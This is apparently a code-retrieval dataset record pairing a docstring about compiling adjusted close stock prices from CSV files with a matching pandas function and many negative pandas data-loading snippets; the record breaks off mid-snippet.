[ "0.78294134", "0.7059564", "0.6983384", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.68293834", "0.6251904", "0.623915", "0.6203214", "0.6163108", "0.6163108", "0.6163108", "0.6115342", "0.6044168", "0.5996663", "0.59861684", "0.5982424", "0.58881533", "0.5855659", "0.5841114", "0.5824856", "0.58043706", "0.58042604", "0.5739522", "0.5735299", "0.5732716", "0.5665129", "0.56581974", "0.5645676", "0.5636061", "0.56256175", "0.55910647", "0.55887824", "0.55788994", "0.5537991", "0.5523505", "0.5518829", "0.5516172", "0.54946554", "0.54695374", "0.5448508", "0.54452544", "0.5419127", "0.5380338", "0.5359679", "0.5353301", "0.5352421", "0.5347443", "0.5343747", "0.5334382", "0.53334373", "0.5322641", "0.5317655", "0.5300268", "0.5289551", "0.52764565", "0.52763665", "0.52761406", "0.5275519", "0.52724683", "0.5268438", "0.5266369", "0.5263986", "0.52626365", "0.5258036", "0.52575725", "0.52485085", "0.52429485", "0.5242068", "0.52401197", "0.52401197", "0.52401197", "0.52401197", "0.5236843", "0.5232151", "0.52321196", "0.52241206", "0.5222309", "0.5221734", "0.5203344", "0.5200386", "0.51982325", "0.5196665" ]
0.7868498
1
Input: filepath of financial data csv dump. Compile all the information into one dataframe and return a dataframe containing the Adjusted Close price values of each security listed in the directory.
def compile_index_data(data_filepath, index_name):

    # find existing .pickle file
    filename = [_ for _ in glob.glob('*.pickle') if index_name in _][0].split('.')[0] + '_adj_close.csv'

    # with open(pickle_list[0],'rb') as f:
    #     tickers = pickle.load(f)

    tickers = os.listdir(data_filepath)
    os.chdir(data_filepath)  # retrieve list of csv files in given filepath

    main_df = pd.DataFrame()  # create empty dataframe

    if filename in tickers:
        print('{} already exists'.format(filename))

    else:
        for count, ticker in enumerate(tickers):
            try:
                # using enumerate to loop through all the tickers
                # and keep track of the number of tickers
                df = pd.read_csv(ticker)  # import csv into dataframe
                df.set_index('Date', inplace=True)
                # set Date column as index column,
                # inplace set to True so that its not redefined it everytime
                # is done in place.

                t_name = ticker.split('.')[0]
                df.rename(columns={'Adj Close': t_name}, inplace=True)
                # since the only values we need for analysis is the adjusted close value
                # we rename column name to ticker symbol
                # df_adj_col_ticker = df[ticker].to_frame()

                if main_df.empty:
                    main_df = df[t_name].to_frame()  # convert series into dataframe
                else:
                    main_df = main_df.join(df[t_name].to_frame(), how='outer')

                # Track progress of compiling
                if count % 10 == 0:
                    print('Percent complete: {}'.format(round(count/500*100)))

            except Exception as e:
                print('Failed to compile {} due to: '.format(t_name) + str(e))
                pass

    # convert dataframe to csv
    print('Compiling data into {}'.format(filename))
    main_df.to_csv(filename)

    return filename
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_df(self, file_path):\n df = pd.read_csv(file_path, sep=\";\")\n df.rename(columns={\"Get\": \"Currency\"}, inplace=True)\n df = df[df[\"Pay\"] == \"Chaos Orb\"]\n df = df[[\"League\", \"Date\", \"Currency\", \"Value\"]]\n df[\"Date\"] = pd.to_datetime(df[\"Date\"])\n df[\"Date\"] = df[\"Date\"] - df.loc[0][\"Date\"]\n return df", "def load_extract(cryptocurrency):\n df = pd.read_csv(f'input_12mo/{cryptocurrency}.csv')\n df = df['Close'].copy()\n df = df[-183:].copy()\n return df", "def get_data(self, df, latest_currency):\n file_paths = list(df[\"File\"])\n df = self.extract_df(file_paths[0])\n df = self.group_df(df)\n df = self.fill_league_currency(df, latest_currency)\n for file_path in file_paths[1:]:\n league = self.extract_df(file_path)\n league_grp = self.group_df(league)\n league_grp = self.fill_league_currency(league_grp, latest_currency)\n df = df.join(league_grp)\n df = df.reset_index(drop=True)\n return df", "def GetRateData(directory):\n\n rt_data = pd.read_csv(directory)\n return rt_data", "def loan_data():\n return pd.read_csv(data_path / \"credit_data.csv\")", "def get_sp500_stocks_file(file_path=None):\n\n df = pd.read_csv(file_path)\n\n return df", "def read_ticker(\n ticker:str) -> pd.DataFrame:\n df = pd.read_csv(f'../data/consolidate/{ticker}.csv',\n index_col='Unnamed: 0',parse_dates=True).fillna(0)\n\n df = df.loc[:, (df != 0).any(axis=0)] # removing 0 columns\n df = df.pct_change().replace([np.inf, -np.inf, np.nan], 0)\n\n return df", "def import_data():\n current_share_prices = pd.read_csv(join('resources', 'share_prices.csv'))\n current_share_prices = current_share_prices.set_index(['Date'])\n current_share_prices.index = pd.to_datetime(current_share_prices.index, format='%m/%d/%Y', infer_datetime_format=True)\n\n contrib = pd.read_csv(join('resources', 'contributions.csv'))\n contrib = contrib.set_index(['Date'])\n contrib.index = pd.to_datetime(contrib.index, format='%m/%d/%Y', infer_datetime_format=True)\n contribs_dollars = contrib[['Traditional', 'Roth', 'Automatic_1', 'Matching', 'Total']]\n contribs_shares = contrib.drop(columns=['Traditional', 'Roth', 'Automatic_1', 'Matching', 'Total'])\n concat = pd.concat([current_share_prices, contribs_shares])\n\n current_shares = []\n for account in contribs_shares:\n current_shares.append(sum(contribs_shares[account]))\n current_shares = np.array(current_shares)\n current_dollars = current_shares * current_share_prices.iloc[0]\n balance_dollars = sum(current_dollars)\n current_distribution = current_dollars / balance_dollars\n\n return current_share_prices, contribs_dollars, contribs_shares, current_shares, current_dollars, balance_dollars", "def load_predict(cryptocurrency):\n df = pd.read_csv(f'output_12mo/{cryptocurrency}.csv')\n #df = df.drop(0, axis=0).copy()\n #df = df['Close'].copy()\n #df = df[:-25].copy()\n return df", "def prepare_data(filename='data/DOT_timeSeries.csv'):\n\n # read data file into pandas dataframe\n df = pd.read_csv(filename)\n\n # extract unwanted 'countries' from dataframe\n countries = ['Europe', 'Emerging and Developing Europe', 'Emerging and Developing Asia',\n 'Middle East, North Africa, and Pakistan', 'Export earnings: nonfuel',\n 'Sub-Saharan Africa', 'Export earnings: fuel', 'Western Hemisphere',\n 'World', 'Special Categories', 'Advanced Economies', 'CIS',\n 'Emerging and Developing Economies']\n for country in countries:\n df = extract_relevant_rows(df, column_name='Country Name', column_value=country, not_equal=True)\n df = extract_relevant_rows(df, 
column_name='Counterpart Country Name', column_value=country, not_equal=True)\n\n # extract exports only from data\n exports = extract_relevant_rows(df, column_name='Indicator Code', column_value='TXG_FOB_USD')\n # extract value attributes only from exports\n export_values = extract_relevant_rows(exports, column_name='Attribute', column_value='Value')\n\n return export_values", "def import_prices(self):\n temp = dict(self.currencies_and_regions)\n for index, row in self.df.iterrows():\n self.set_mini_bundle_name(row[\"Journal Name \"])\n self.set_issns(row[\"ISSN\"])\n self.set_currency(row[\"Currency\"])\n if not self.currency:\n continue\n cur = self.get_raw_currency(row[\"Currency\"])\n region = temp[cur]\n self.set_region(region)\n self.set_country(region)\n self.set_price(row[\"2021 rate\"])\n self.add_prices()\n\n # reset for next loop\n self.issns = []\n db.session.commit()", "def import_prices(self):\n temp = dict(self.currencies_and_regions)\n for index, row in self.df.iterrows():\n self.set_journal_name(row[\"Journal Name \"])\n self.set_issn(row[\"ISSN\"])\n self.set_journal()\n self.set_currency(row[\"Currency\"])\n if not self.currency:\n continue\n cur = self.get_raw_currency(row[\"Currency\"])\n region = temp[cur]\n self.set_region(region)\n self.set_country(region)\n self.process_fte(row[\"Price Group\"])\n self.set_price(row[\"2021 rate\"])\n self.add_price_to_db()\n\n db.session.commit()", "def process_fx_file(path):\n data = pd.read_csv(path, delimiter=';', decimal=',', parse_dates=[\"Date\"], date_parser=fx_dateparse)\n data.to_csv(path.split(\".\")[0] + \"_pr.\" + path.split(\".\")[1], float_format='%.6f', index=False)\n \n return data", "def _get_liwc_df(self) -> pd.DataFrame:\n data = pd.read_csv(self.path)\n data.index = pd.to_numeric(data['Filename'].str.rstrip('.txt'))\n return data", "def process_csv(filepath):\n suburb = get_suburb(filepath)\n read_file = pd.read_csv(filepath,\n infer_datetime_format=True,\n parse_dates=[\"SALE DATE\"],\n dayfirst=True)\n read_file[\"SUBURB\"] = suburb\n separate_date(read_file)\n return read_file", "def get_data(filename):\n\n # Read csv file as panda dataframe\n data = pd.read_csv(filename)\n data.columns = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'MarketCap']\n\n # Adjast frames\n data['Date'] = pd.to_datetime(data['Date'])\n data['Average'] = data.eval('Open + Close') / 2\n \n # Adjust diff column\n data['Diff'] = data['Average'] - data['Average'].shift(1)\n \n # Return data as lists\n return data['Date'].tolist()[1:], data['Average'].tolist()[1:], data['Diff'].tolist()[1:]", "def mergeDatabase(df):\n\n\tabsPath = os.path.abspath(__file__)\n\tabsPath = os.path.split(absPath)[0]\n\tabsPath = ''\n\n\tdataPath = os.path.join(absPath, 'dual-data')\n\n\tdfFinal = None\n\n\t# 20210122__0002_lcrPicker has high-freq ap, no lcr b/w spikes\n\trejectionList = ['dual-data/20210122/20210122__0002_lcrPicker.csv']\n\n\tprint('dataPath:', dataPath)\n\tnumFiles = 0\n\tfor obj in os.listdir(dataPath):\n\t\tfolderPath = os.path.join(dataPath, obj)\n\t\tif os.path.isdir(folderPath):\n\t\t\tprint('folderPath:', folderPath)\n\t\t\tfor file in os.listdir(folderPath):\n\t\t\t\tif file.startswith('.'):\n\t\t\t\t\tcontinue\n\t\t\t\tif file.endswith('_lcrPicker.csv'):\n\t\t\t\t\tcsvPath = os.path.join(folderPath, file)\n\t\t\t\t\tprint(' csvPath:', csvPath)\n\n\t\t\t\t\tif csvPath in rejectionList:\n\t\t\t\t\t\tprint('!!! 
rejecting csvPath:', csvPath)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnumFiles += 1\n\t\t\t\t\tif dfFinal is None:\n\t\t\t\t\t\tdfFinal = pd.read_csv(csvPath, header=0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tdf0 = pd.read_csv(csvPath, header=0)\n\t\t\t\t\t\tdfFinal = dfFinal.append(df0)\n\t\t\t\t\t\tdfFinal.reset_index(drop=True)\n\t\t\t\t\t\t# todo: should be\n\t\t\t\t\t\t#dfFinal = dfFinal.reset_index(drop=True)\n\n\t#\n\t# add new column for time of lcr before spike\n\t# todo: make new col to get rid of lcr where lcrPreSpikeSec < 0.1 sec\n\tif 1:\n\t\tdfFinal['lcrPreSpikeSec'] = dfFinal['spikeSec'] - dfFinal['lcrSec']\n\n\t\t#print(dfFinal[ np.isnan(dfFinal['lcrPreSpikeSec']) ] )\n\n\t\t# remove lcr (rows) that are close to before the spike, lcrPreSpikeSec<0.1\n\t\t# important: we need second or np.isnan() to KEEP lcrPicker with no spike detecct\n\t\tlcrNoCloserThanSec = 0.15\n\t\tprint('num lcr before removing lcr close to spike:', len(dfFinal))\n\t\tdfFinal = dfFinal[ (dfFinal['lcrPreSpikeSec'] > lcrNoCloserThanSec) | (np.isnan(dfFinal['lcrPreSpikeSec']) ) ]\n\t\tprint(' after removing lcr close to spike:', len(dfFinal))\n\n\t#\n\t# save merged ccsv\n\tmasterCsv = 'lcrPicker-db.csv'\n\tprint('mergeDatabase() merged:', numFiles, '...saving masterCsv:', masterCsv)\n\tdfFinal.to_csv(masterCsv)", "def loadSensitivity(tradeTbl, sensiTbl, filepath, vectorField):\n\n df = pd.read_csv(filepath)\n df[\"AsOfDate\"] = pd.to_datetime(df[\"AsOfDate\"]).dt.date\n df[vectorField] = getArrayValue(df[vectorField])\n\n if \"CashflowKey\" not in df.columns:\n df[\"CashflowKey\"] = \"-\"\n\n tradeTbl.load_pandas(df[tradeTbl.columns])\n sensiTbl.load_pandas(df[sensiTbl.columns])", "def process(self, inputs):\n df = cudf.read_csv(self.conf['path'])\n # extract the year, month, day\n ymd = df['DTE'].astype('str').str.extract(r'(\\d\\d\\d\\d)(\\d\\d)(\\d\\d)')\n # construct the standard datetime str\n df['DTE'] = ymd[0].str.cat(ymd[1],\n '-').str.cat(ymd[2],\n '-').astype('datetime64[ms]')\n df = df[['DTE', 'OPEN', 'CLOSE', 'HIGH', 'LOW', 'SM_ID', 'VOLUME']]\n df['VOLUME'] /= 1000\n # change the names\n df.columns = ['datetime', 'open', 'close',\n 'high', 'low', \"asset\", 'volume']\n return df", "def create_df(filename):\n data = pd.read_csv(filename)\n data = data.dropna(axis='index')\n data['inc_angle'] = np.radians(data['inc_angle'])\n data = data.astype('float64')\n data = data[data['inc_angle'] <= np.deg2rad(80)]\n return data", "def readAllDatForCurrency(data_dir, currencyCode):\n datatestnames = list(filter(lambda a : (currencyCode in a), listdir(data_dir)))\n dfs = [readDAT(data_dir + name) for name in datatestnames]\n allDf = pd.concat(dfs)\n allDf = allDf.sort_values(by=['datetime'], ascending=True).reset_index(drop=True).set_index('datetime')\n return allDf", "def get_price_info(price_filename, commodity):\n prices = []\n prices = pd.read_csv(price_filename, sep=' ', index_col=0)\n\n five_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 5), name='five_day_avg')\n ten_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 10), name='ten_day_avg')\n thirty_day_avg = pd.Series(pd.rolling_mean(prices[commodity], 30), name='thirty_day_avg')\n \n price_info = pd.DataFrame(pd.concat([prices, five_day_avg, ten_day_avg, thirty_day_avg], axis=1))\n \n price_diffs = prices[commodity].diff()\n # price_changes_series = pd.Series(np.array(price_diffs > 0), dtype=int, index=price_info.index.values)\n price_changes_series = pd.Series([0.333 if (np.isnan(x) or np.isnan(y)) else 100000.0 * x / y for (x, y) in 
zip(price_diffs, prices[commodity])], dtype=int, index=price_info.index.values)\n price_changes_series = prices[commodity]\n return price_info, price_changes_series", "def get_price_df(url):\n df = pd.read_csv(url).dropna()\n df.index = pd.to_datetime(df['Date'])\n df = df.drop(columns=['Date'])\n return df", "def get_data():\n input_dfs = []\n\n # get data folder\n parent_path = get_parent_dir(os.path.abspath(__file__), 2)\n data_folder = str(parent_path + os.path.join(folder_name))\n assert os.path.exists(data_folder) == True, \"The specified data folder cannot be located.\"\n\n # Load and pre process input data\n # Descriptive statistics used (per http://journals.plos.org/plosone/article?id=10.1371/journal.pone.0155133):\n # * BIAS(n): Measures the divergence of the current log return from an n-day moving \n # average of log returns. We let n = 6. \n # * PSY(n): Psychological line is a proxy for market sentiment.\n # * ASY(n): The average return in the last n days.\n # * OBV: The average return in the last n days.\n\n # ASX SPI 200 Index Futures, Continuous Contract #2 (AP2)\n df_asx_200 = pd.read_csv(os.path.join(data_folder, \"AXJO.csv\"), index_col=0, parse_dates=True)\n df_asx_200 = process_input_df(df_asx_200, 'AXJO', 'Close')\n\n df_asx_200['log_r'] = np.log(df_asx_200['close']).diff() * 100\n df_asx_200['ma5_r'] = df_asx_200['log_r'].shift(1).rolling(window=5).sum()\n df_asx_200['bias6_r'] = df_asx_200['log_r'].shift(1) - df_asx_200['log_r'].shift(1).rolling(window=6).sum()\n df_asx_200['psy12_r'] = (df_asx_200['log_r'].shift(1).rolling(window=12, min_periods=12)\n .agg(lambda x: (x > 0).sum())) / 12\n\n # ASX Trading Volumes (Daily)\n df_asx_vol = pd.read_csv(os.path.join(data_folder, \"asx_volume.csv\"), index_col=0, parse_dates=True)\n input_dfs.append(process_input_df(df_asx_vol, 'volume', 'AS51 Index'))\n\n # Dow Jones Industrial Average\n df_dji = pd.read_csv(os.path.join(data_folder, \"DJI.csv\"), index_col=0, parse_dates=True)\n input_dfs.append(process_input_df(df_dji, 'dji', 'Close'))\n\n # Create final data frame with all required input and output data\n output_fml = np.where(df_asx_200['log_r'] > 0, 1, 0)\n df_asx_200.insert(loc=1, column='output', value=output_fml)\n df_asx_200.drop('close', axis=1, inplace=True)\n df_asx_200.drop('log_r', axis=1, inplace=True)\n\n for df in input_dfs:\n df.drop('close', axis=1, inplace=True)\n df_asx_200 = pd.merge(df_asx_200, df, how='inner', left_index=True, right_index=True)\n\n # Drop all rows with na values - will not effect drivers for date\n df_asx_200 = df_asx_200.dropna(axis=0, how='any')\n\n return df_asx_200", "def get_data(fpath):\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n CLINICAL_EVENT=cdtype(visits, ordered=True),\n TESTNAME=str,\n TESTVALUE=str)\n\n fname = op.join(fpath, 'Current_Biospecimen_Analysis_Results.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n data['TESTVALUE'] = pd.to_numeric(data.TESTVALUE, errors='coerce')\n data = data.rename(columns=RENAME_COLS).assign(**ASSIGN_COLS)[RETAIN_COLS]\n data = data.dropna(axis=0, subset=['SCORE'])\n\n return data", "def load_data(data_path='./data/'):\n # Electricity prices for 1.1.2014 - 14.10.2016 [e/MWh]\n prices = pd.read_csv(data_path + 'prices.csv', sep=\";\", decimal=\",\", names=['ts','blockid','price'], skiprows=1)\n prices['ts'] = pd.to_datetime(prices.ts, format='%d.%m.%Y %H:%M')\n prices.set_index('ts',inplace=True)\n \n # Paper item 
consumptions [MWh/block]\n items = pd.read_csv(data_path + 'items.csv', sep=\";\", decimal=\",\", names=['item','consumption'], skiprows=1)\n \n # One realized schedule, 75 blocks for 29.9.2016 - 11.10.2016\n schedule = pd.read_csv(data_path + 'schedule.csv', sep=\";\", decimal=\",\")\n schedule.columns = ['ts','blockid'] + itemnames() + ['price']\n schedule['ts'] = pd.to_datetime(schedule.ts, format='%d.%m.%Y %H:%M')\n return(prices,items,schedule)", "def get_existing_data_for_ticker(ticker):\n filename = get_filename_for_ticker(ticker)\n logger.debug(f'Processing {filename}')\n df_ticker_data = pd.DataFrame()\n try:\n df_ticker_data = pd.read_csv(filename, index_col='Date')\n df_ticker_data.index = pd.to_datetime(df_ticker_data.index)\n except FileNotFoundError:\n logger.error(f'Error in opening {filename}')\n except Exception as e:\n logging.error(f'Error {e} while accessing existing data')\n return df_ticker_data", "def _read_csv(self) -> pd.DataFrame:\n\n return pd.concat(\n [\n pd.read_csv(f, usecols=[1, 2, 3, 4, 5])\n for f in self.temp_path.iterdir()\n if f.name.endswith(\".csv\")\n ]\n )", "def _open_csv_file(self):\n for s in self.symbol_list:\n self.symbol_data[s] = pd.read_csv(\n os.path.join(self.csv_dir, '%s.csv' % s),\n header=0, parse_dates=True,\n\n )\n self.symbol_data[s] = self.symbol_data[s][self.symbol_data[s]['Time'] >= self.start_time]\n self.symbol_data[s] = self.symbol_data[s][self.symbol_data[s]['Time'] <= self.end_time]\n for s in self.symbol_list:\n self.symbol_data[s] = self.symbol_data[s].iterrows()", "def create_dataframe_from_dir(directory):\n\n if not os.path.exists(directory):\n return pd.DataFrame()\n\n file_list = os.listdir(directory)\n\n file_list.sort()\n\n df_list = []\n for filename in file_list:\n\n if filename.startswith(\"_\") or (not filename.endswith(\".csv\")):\n continue\n\n # Assert that the file is named correctly\n _, start_date, end_date = check_filename_convention(filename)\n\n df = pd.read_csv(os.path.join(directory, filename))\n df = df.assign(SourceFile=filename)\n\n # In January 2020, MS changed the date format used in the usage\n # export files from US to UK. This happen between 24/01/2020 -\n # 28/01/2020. 
The following if statement is to deal with this\n # change.\n if start_date is None or end_date is None:\n continue\n\n if start_date > datetime.datetime(2020, 1, 24, 0, 0):\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%d/%m/%Y\"\n )\n except Exception:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%m/%d/%Y\"\n )\n except Exception:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%Y-%m-%d\"\n )\n else:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%m/%d/%Y\"\n )\n except Exception:\n try:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%d/%m/%Y\"\n )\n except Exception:\n df[CONST_COL_NAME_DATE] = pd.to_datetime(\n df[CONST_COL_NAME_DATE], format=\"%Y-%m-%d\"\n )\n\n # Check if data comes from EduHub\n if CONST_COL_NAME_HANDOUTNAME in df.columns:\n\n # Renaming HandoutName to SubscriptionName\n df = df.rename(\n columns={CONST_COL_NAME_HANDOUTNAME: CONST_COL_NAME_SNAME}\n )\n\n # Dropping columns CourseName,LabName\n df = df.drop(\n columns=[CONST_COL_NAME_LABNAME, CONST_COL_NAME_COURSENAME]\n )\n\n df_list.append(df)\n\n if len(df_list) == 0:\n return pd.DataFrame()\n\n total_df = pd.concat(df_list, axis=0, ignore_index=True)\n\n return total_df", "def get_stock_data(path):\n prices = pd.read_csv(path, index_col='Date', parse_dates=True,\n usecols=['Date', 'Close'], na_values=['nan'])\n dates = pd.date_range('2019-02-13', '2020-07-28')\n df = pd.DataFrame(index=dates)\n df = df.join(prices)\n df = df.dropna()\n reversed_df = df.iloc[::-1]\n return reversed_df", "def get_data(symbols, dates):\n \n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols:\n symbols.insert(0,'SPY')\n for symbol in symbols:\n \n df1 = pd.read_csv(symbol_to_path(symbol),usecols=['Date','Adj Close'],\n index_col='Date',na_values =['nan'] )\n df1 = df1.rename(columns ={\"Adj Close\": symbol}) \n #print df1\n df = df.join(df1,how='inner')\n \n return df.sort_index()", "def __get_all_data(self,tickr):\n self.__csvurl=f\"https://query1.finance.yahoo.com/v7/finance/download/{tickr}?period1=1092873600&period2={int(datetime.now().timestamp())}&interval=1d&events=history&includeAdjustedClose=true\"\n s=get_historic_data(self.__csvurl)\n\n \"\"\"you should not be able to access dataframe from outside the class\"\"\"\n df=pd.read_csv(io.StringIO(s.decode('utf-8')))\n df=df.dropna()\n df_columns=['Date','High','Low','Close','Adj Close']\n\n if not set(df_columns).issubset(df.columns):\n raise ValueError(f\"One or more columns are missing {df_columns}\")\n\n if len(df.index)<5:\n raise ValueError(f\"Cannot calculate EMA 5\")\n\n if len(df.index)<20:\n raise ValueError(f\"Cannot calculate SMA 20\")\n\n \"\"\"set date as index (required for filtering,sorting,grouping etc etc\"\"\"\n df['Date'] = pd.to_datetime(df['Date'], format = '%Y-%m-%d')\n\n df.set_index(['Date'], inplace=True)\n\n\n return df", "def _load_price_csv(symbol):\n with open(f\"data_public/prices-{symbol}.csv\", \"r\") as csvfile:\n price_by_date = {}\n reader = csv.reader(csvfile, delimiter=',')\n next(reader) # discard header\n for row in reader:\n price_by_date[row[0]] = float(row[1])\n return price_by_date", "def csv_loader(csv_file):\n df = pd.read_csv(csv_file, sep=';', parse_dates=['Data_Alteraçao'])\n pd.set_option('display.float_format', '{:.0f}'.format)\n\n df = df.fillna(0)\n df = df.drop(columns=['Cod. Pareamento', 'Cod. UF', 'Sigla UF', 'Cod. 
Subarea',\n 'Nome Subarea', 'Cod. Municipio', 'Nome Municipio', 'Codigo Agencia',\n 'Nome Agencia', 'Cod. Setor', 'Cod. Logradouro CNEFE',\n 'Tipo Logradouro CNEFE', 'Titulo Logradouro CNEFE',\n 'Nome Logradouro CNEFE', 'Nome Tratado CNEFE', 'Tipo Logradouro DNE',\n 'Titulo Logradouro DNE', 'Nome Logradouro DNE', 'Nome Tratado DNE',\n 'Logradouro Completo DNE', 'Distancia', 'Cod. Match', 'Motivo Match',\n 'CEPs Face', 'Localidade Face',\n 'Alterar Logradouro para DNE?', 'Observaçao', 'SIAPE Alteração',\n 'Nome Alteraçao', 'Data_Alteraçao', 'Status', 'Unnamed: 33'])\n\n # df.astype({'CEP Logradouro CNEFE': 'int32'}).dtypes\n\n df['CEP'] = df['CEP'].str.replace(' ', '', regex=False)\n\n ceps_dne = []\n for index, row in df.iterrows():\n if type(row.CEP) == str:\n for cep in row.CEP.split(','):\n # print(index, cep)\n ceps_dne.append(int(cep))\n\n ceps_cnefe = df['CEP Logradouro CNEFE'].astype(int).tolist()\n ceps = ceps_dne + ceps_cnefe\n ceps = list(set(ceps))\n return pd.Series(ceps)", "def get_data(symbols, dates, base_dir=\"../data/\"):\n df = pd.DataFrame(index=dates)\n if 'SPY' not in symbols:\n symbols.insert(0, 'SPY')\n\n for symbol in symbols:\n temp_df = pd.read_csv(symbol_to_path(symbol, base_dir), index_col='Date',\n parse_dates=True, usecols=['Date', 'Close'],\n na_values=['nan'])\n temp_df = temp_df.rename(columns={'Close': symbol})\n df = df.join(temp_df, how='inner')\n return df", "def get_data(path):\n df = pd.read_csv(path)\n\n return df", "def process_file_pd(file_name):\n try:\n df = pd.read_csv(file_name)\n return df\n except OSError as e:\n print('Error' + str(e))\n raise", "def prepare_dataframe(input_path, index_col=\"label\"):\n df = pd.read_csv(input_path, index_col=index_col)\n df = df[df.power_technology != \"IGCC\"]\n df = df[df.region != \"China\"]\n\n df.loc[:, \"delta_capex\"] = df.loc[:, \"capital_cost_cc\"] - df.loc[:, \"capital_cost\"]\n df.loc[:, \"delta_lcoe_capex\"] = df.loc[:, \"lcoe_capex_cc\"] - df.loc[:, \"lcoe_capex\"]\n df.loc[:, \"delta_om\"] = df.loc[:, \"lcoe_om_cc\"] - df.loc[:, \"lcoe_om\"]\n df.loc[:, \"delta_heatrate\"] = df.loc[:, \"heat_rate_cc\"] - df.loc[:, \"heat_rate\"]\n return df", "def readCsv(variables, path, pathCsv, estacion):\n # os.makedirs('../data/totalData/')\n dataVa = df.DataFrame()\n variables = variables\n mypath = path\n patron = re.compile(variables + '_'+estacion+'_\\d\\d\\d\\d-\\d\\d-\\d\\d' + '.*')\n for base, dirs, filess in os.walk(mypath, topdown=False):\n filess = sorted(filess)\n for value in filess:\n if patron.match(value) != None:\n tempData = df.read_csv(mypath + value)\n #tempData = completeMet(tempData)\n tempData = tempData.iloc[0:24, :]\n dataVa = concat([tempData, dataVa], axis=0)\n dataVa = dataVa.reset_index()\n dataVa = dataVa.drop(labels='index', axis=1)\n dataVa.to_csv(pathCsv + variables + '_'+ estacion +'_total.csv', encoding='utf-8', index=False)\n dataVa = df.DataFrame()", "def get_data(ticker, tickers):\n \n print(ticker)\n ## Date setting\n today = datetime.today()\n days_ago_90 = today - timedelta(days = 90)\n today = today.strftime(\"%Y-%m-%d\")\n days_ago_90 = days_ago_90.strftime(\"%Y-%m-%d\")\n \n df_ticker = web.DataReader(ticker, 'yahoo', start = days_ago_90, end = today)\n \n ## To get prices, iloc is used. 
It's because shifting by timedetlas will result in error in cases where some holidays occured \n price_most_recent = df_ticker.iloc[-1, 5]\n price_7_days_ago = df_ticker.iloc[-7, 5]\n price_21_days_ago = df_ticker.iloc[-21, 5]\n price_30_days_ago = df_ticker.iloc[-30, 5]\n price_90_days_ago = df_ticker.iloc[0,5]\n \n ## Getting price change\n price_change_7_days = price_change(price_most_recent, price_7_days_ago)\n price_change_21_days = price_change(price_most_recent, price_21_days_ago)\n price_change_30_days = price_change(price_most_recent, price_30_days_ago)\n price_change_90_days = price_change(price_most_recent, price_90_days_ago)\n \n ## Checking for constant price drop\n constant_price_drop_7 = constant_price_drop_detector(df_ticker, 7)\n ## Only if price drops constantly for 7 days it makes sense to check for this pattern in 21 days period\n if constant_price_drop_7 == \"YES\":\n constant_price_drop_21 = constant_price_drop_detector(df_ticker, 21)\n else:\n constant_price_drop_21 = \"NO\"\n \n ## Now creating the final df to return\n df_prices = df_ticker[['Adj Close']].T\n df_prices.index = [ticker]\n df_prices.reset_index(inplace = True)\n \n full_name = tickers.loc[tickers[\"Ticker\"] == ticker, 'Full Name'].values[0]\n df_prices['company_name'] = full_name\n df_prices['price_90_days_ago'] = price_90_days_ago\n df_prices['price_30_days_ago'] = price_30_days_ago\n df_prices['price_21_days_ago'] = price_21_days_ago\n df_prices['price_7_days_ago'] = price_7_days_ago\n df_prices['price_most_recent'] = price_most_recent\n \n df_prices['price_change_7_days'] = price_change_7_days\n df_prices['price_change_21_days'] = price_change_21_days\n df_prices['price_change_30_days'] = price_change_30_days\n df_prices['price_change_90_days'] = price_change_90_days\n \n df_prices['constant_price_drop_7'] = constant_price_drop_7\n df_prices['constant_price_drop_21'] = constant_price_drop_21\n \n df_prices.fillna(\"None\", inplace = True)\n \n return df_prices", "def clean_positions(path):\n columnas = [\n PositionsRaw.PRICE,\n PositionsRaw.PRODUCT,\n PositionsRaw.ISIN,\n PositionsRaw.QUANTITY,\n PositionsRaw.VALUE_LOCAL,\n PositionsRaw.VALUE_EUR,\n ]\n\n long = pd.DataFrame(columns=columnas)\n\n files = list(path.glob(\"pos*.csv\"))\n for file in tqdm(files):\n\n # ---------------------------------------------------------------------\n # Read file\n try:\n positions_day = pd.read_csv(file)\n except EmptyDataError:\n continue\n\n # ---------------------------------------------------------------------\n # Replace commas with dots\n columns_to_clean = [\n PositionsRaw.PRICE,\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_clean] = replace_values(\n frame=positions_day[columns_to_clean],\n old=\",\",\n new=\".\",\n )\n\n # ---------------------------------------------------------------------\n # Extract numerical values\n columns_to_extract = [\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_extract] = extract_numbers(\n positions_day[columns_to_extract]\n )\n\n # ---------------------------------------------------------------------\n # Convert to float and string\n columns_to_float = [\n PositionsRaw.QUANTITY,\n PositionsRaw.PRICE,\n PositionsRaw.VALUE_EUR,\n PositionsRaw.VALUE_LOCAL,\n ]\n positions_day[columns_to_float] = positions_day[columns_to_float].astype(float)\n\n columns_to_string = [PositionsRaw.ISIN, PositionsRaw.PRODUCT]\n positions_day = positions_day.fillna(\"-\")\n positions_day[columns_to_string] = 
